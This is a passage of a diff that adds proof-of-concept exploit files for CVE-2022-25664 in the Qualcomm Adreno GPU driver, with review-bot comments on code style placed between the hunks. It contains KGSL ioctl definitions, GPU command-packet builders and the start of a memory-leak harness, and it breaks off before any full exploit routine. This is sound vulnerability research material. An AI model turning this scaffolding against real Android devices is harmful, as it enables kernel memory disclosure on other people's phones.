kgsl_ctx_create(int fd, uint32_t *ctx_id); +int kgsl_gpu_command_payload(int fd, uint32_t ctx_id, uint64_t gpuaddr, uint32_t cmdsize, uint32_t n, uint32_t target_idx, uint64_t target_cmd, uint32_t target_size); +int kgsl_map(int fd, unsigned long addr, size_t len, uint64_t *gpuaddr, int readonly); + +#endif 
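Review bot: The Doxygen block that precedes `IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE` documents a different ioctl — it is titled `struct kgsl_syncsource_signal_fence - Argument to IOCTL_KGSL_SYNCSOURCE_SIGNAL_FENCE` and describes signalling a fence — so it should either be replaced by a comment for the create-fence ioctl (`/* IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE: create a fence fd on syncsource @id; @fence_fd is the output */`) or moved next to a `SIGNAL_FENCE` definition if one is added. `KGSL_MEMFLAGS_USE_CPU_MAP` is defined twice in this header with the same value; identical redefinition is legal but one copy should go. The `__user` annotation on the `uint64_t __user cmdlist` style fields must be defined away somewhere (presumably by one of the `#include` lines whose targets are not visible in this rendering) or the header does not compile — worth a `#ifndef __user #define __user #endif` in the header itself so it is self-contained.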
diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h new file mode 100644 index 0000000..7224cc6 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno.h 
@@ -0,0 +1,218 @@ +#ifndef ADRENO_H +#define ADRENO_H + +#define KGSL_MEMFLAGS_GPUREADONLY 0x01000000U + +enum kgsl_user_mem_type { + KGSL_USER_MEM_TYPE_PMEM = 0x00000000, + KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001, + KGSL_USER_MEM_TYPE_ADDR = 0x00000002, + KGSL_USER_MEM_TYPE_ION = 0x00000003, + KGSL_USER_MEM_TYPE_DMABUF = 0x00000003, + KGSL_USER_MEM_TYPE_MAX = 0x00000007, +}; + +struct kgsl_command_object { + uint64_t offset; + uint64_t gpuaddr; + uint64_t size; + unsigned int flags; + unsigned int id; +}; + +struct kgsl_gpu_command { + uint64_t flags; + uint64_t __user cmdlist; + unsigned int cmdsize; + unsigned int numcmds; + uint64_t __user objlist; + unsigned int objsize; + unsigned int numobjs; + uint64_t __user synclist; + unsigned int syncsize; + unsigned int numsyncs; + unsigned int context_id; + unsigned int timestamp; +}; + +struct kgsl_map_user_mem { + int fd; + unsigned long gpuaddr; /*output param */ + size_t len; + size_t offset; + unsigned long hostptr; /*input param */ + enum kgsl_user_mem_type memtype; + unsigned int flags; +}; + +struct kgsl_drawctxt_create { + unsigned int flags; + unsigned int drawctxt_id; /*output param */ +}; + +/* destroy a draw context */ +struct kgsl_drawctxt_destroy { + unsigned int drawctxt_id; +}; + + +#define KGSL_IOC_TYPE 0x09 + +#define IOCTL_KGSL_DRAWCTXT_CREATE \ + _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create) + +#define IOCTL_KGSL_DRAWCTXT_DESTROY \ + _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy) + +#define IOCTL_KGSL_MAP_USER_MEM \ + _IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem) + +#define IOCTL_KGSL_GPU_COMMAND \ + _IOWR(KGSL_IOC_TYPE, 0x4A, struct kgsl_gpu_command) + +#define KGSL_CMDLIST_IB 0x00000001U +#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL + +#define CP_TYPE4_PKT (4 << 28) +#define CP_TYPE7_PKT (7 << 28) + +#define CP_NOP 0x10 +#define CP_WAIT_FOR_ME 0x13 +#define CP_WAIT_FOR_IDLE 0x26 +#define CP_WAIT_REG_MEM 0x3c +#define CP_MEM_WRITE 0x3d +#define CP_INDIRECT_BUFFER_PFE 
0x3f +#define CP_SET_DRAW_STATE 0x43 +#define CP_MEM_TO_MEM 0x73 +#define CP_SET_PROTECTED_MODE 0x5f + +#define upper_32_bits(n) ((uint32_t)(((n) >> 16) >> 16)) +#define lower_32_bits(n) ((uint32_t)(n)) + + +#define PT_BASE 0xfc000000 +#define KGSL_OBJLIST_MEMOBJ 0x00000008U +#define KGSL_OBJLIST_PROFILE 0x00000010U +#define KGSL_DRAWOBJ_PROFILING 0x00000010 +#define KGSL_MEMFLAGS_IOCOHERENT (1ULL << 31) + +struct kgsl_device_getproperty { + unsigned int type; + void *value; + size_t sizebytes; +}; + +#define IOCTL_KGSL_DEVICE_GETPROPERTY \ + _IOWR(KGSL_IOC_TYPE, 0x2, struct kgsl_device_getproperty) + + +struct kgsl_gpumem_alloc_id { + unsigned int id; + unsigned int flags; + uint64_t size; + uint64_t mmapsize; + unsigned long gpuaddr; +}; + +struct kgsl_gpumem_free_id { + unsigned int id; +}; + +#define IOCTL_KGSL_GPUMEM_ALLOC_ID \ + _IOWR(KGSL_IOC_TYPE, 0x34, struct kgsl_gpumem_alloc_id) + +struct kgsl_sharedmem_free { + unsigned long gpuaddr; +}; + +#define IOCTL_KGSL_SHAREDMEM_FREE \ + _IOW(KGSL_IOC_TYPE, 0x21, struct kgsl_sharedmem_free) + +static inline uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr) +{ + uint *start = cmds; + + *cmds++ = lower_32_bits(gpuaddr); + *cmds++ = upper_32_bits(gpuaddr); + + return cmds - start; +} + +static inline uint pm4_calc_odd_parity_bit(uint val) { + return (0x9669 >> (0xf & ((val) ^ + ((val) >> 4) ^ ((val) >> 8) ^ ((val) >> 12) ^ + ((val) >> 16) ^ ((val) >> 20) ^ ((val) >> 24) ^ + ((val) >> 28)))) & 1; +} + +static inline uint cp_type7_packet(uint opcode, uint cnt) { + return CP_TYPE7_PKT | ((cnt) << 0) | + (pm4_calc_odd_parity_bit(cnt) << 15) | + (((opcode) & 0x7F) << 16) | + ((pm4_calc_odd_parity_bit(opcode) << 23)); +} + +static inline uint cp_wait_for_me( + uint *cmds) +{ + uint *start = cmds; + + *cmds++ = cp_type7_packet(CP_WAIT_FOR_ME, 0); + + return cmds - start; +} + +static inline uint cp_mem_packet(int opcode, uint size, uint num_mem) { + return cp_type7_packet(opcode, size + num_mem); +} + +static inline uint 
cp_wait_for_idle( + uint *cmds) +{ + uint *start = cmds; + + *cmds++ = cp_type7_packet(CP_WAIT_FOR_IDLE, 0); + + return cmds - start; +} + +static inline int _adreno_iommu_add_idle_indirect_cmds( + unsigned int *cmds) +{ + unsigned int *start = cmds; + cmds += cp_wait_for_me(cmds); + *cmds++ = cp_mem_packet(CP_INDIRECT_BUFFER_PFE, 2, 1); + cmds += cp_gpuaddr(cmds, 0xfc000000+1024); + *cmds++ = 2; + cmds += cp_wait_for_idle(cmds); + return cmds - start; +} + +static inline uint cp_type4_packet(uint opcode, uint cnt) +{ + return CP_TYPE4_PKT | ((cnt) << 0) | + (pm4_calc_odd_parity_bit(cnt) << 7) | + (((opcode) & 0x3FFFF) << 8) | + ((pm4_calc_odd_parity_bit(opcode) << 27)); +} + +static inline uint cp_register( + unsigned int reg, unsigned int size) +{ + return cp_type4_packet(reg, size); +} + +static inline uint cp_invalidate_state( + uint *cmds) +{ + uint *start = cmds; + + *cmds++ = cp_type7_packet(CP_SET_DRAW_STATE, 3); + *cmds++ = 0x40000; + *cmds++ = 0; + *cmds++ = 0; + + return cmds - start; +} + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c new file mode 100644 index 0000000..ba980e8 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_user/adreno_user.c 
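Review bot: `_adreno_iommu_add_idle_indirect_cmds` hard-codes `0xfc000000+1024` even though the same header defines `PT_BASE 0xfc000000` a few lines earlier, so the line should be `cmds += cp_gpuaddr(cmds, PT_BASE + 1024);`. Its name begins with an underscore at file scope, which C reserves for the implementation; `adreno_iommu_add_idle_indirect_cmds` avoids that. The header has no `#include` of its own yet uses `uint64_t`, `size_t`, `uint` and `_IOWR`, so it only compiles when the including file happens to have pulled in `<stdint.h>`, `<sys/types.h>` and `<sys/ioctl.h>` first; adding those includes (or a comment stating the requirement) makes it self-contained. The packet helpers here duplicate adreno_kernel/adreno_cmd.c almost line for line, so a fix in one copy has to be applied to the other.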
@@ -0,0 +1,221 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "adreno.h" + +#define LEAK_SIZE 100 + +#define COMMAND_SIZE 4 + +static void hexdump(void *_data, size_t byte_count) { + printf("hexdump(%p, 0x%lx)\n", _data, (uint64_t)byte_count); + for (uint64_t byte_offset = 0; byte_offset < byte_count; byte_offset += 16) { + unsigned char *bytes = ((unsigned char*)_data) + byte_offset; + uint64_t line_bytes = (byte_count - byte_offset > 16) ? + 16 : (byte_count - byte_offset); + char line[1000]; + char *linep = line; + linep += sprintf(linep, "%08lx ", byte_offset); + for (int i=0; i<16; i++) { + if (i >= line_bytes) { + linep += sprintf(linep, " "); + } else { + linep += sprintf(linep, "%02hhx ", bytes[i]); + } + } + linep += sprintf(linep, " |"); + for (int i=0; i